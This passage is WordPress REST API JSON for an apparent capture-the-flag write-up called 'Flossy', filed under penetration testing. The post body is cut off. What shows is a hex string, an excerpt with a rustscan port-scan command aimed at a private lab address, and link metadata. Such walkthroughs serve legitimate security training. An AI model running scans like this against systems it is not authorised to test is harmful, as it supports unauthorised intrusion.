\n355cec17306ab25389f376ef4a21422e<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Flossy Information Gathering Port Scanning rustscan -a 192.168.0.104 &#8212; -A Open 1 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-572","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=572"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/572\/revisions"}],"predecessor-version":[{"id":573,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/572\/revisions\/573"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=572"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=572"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=572"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}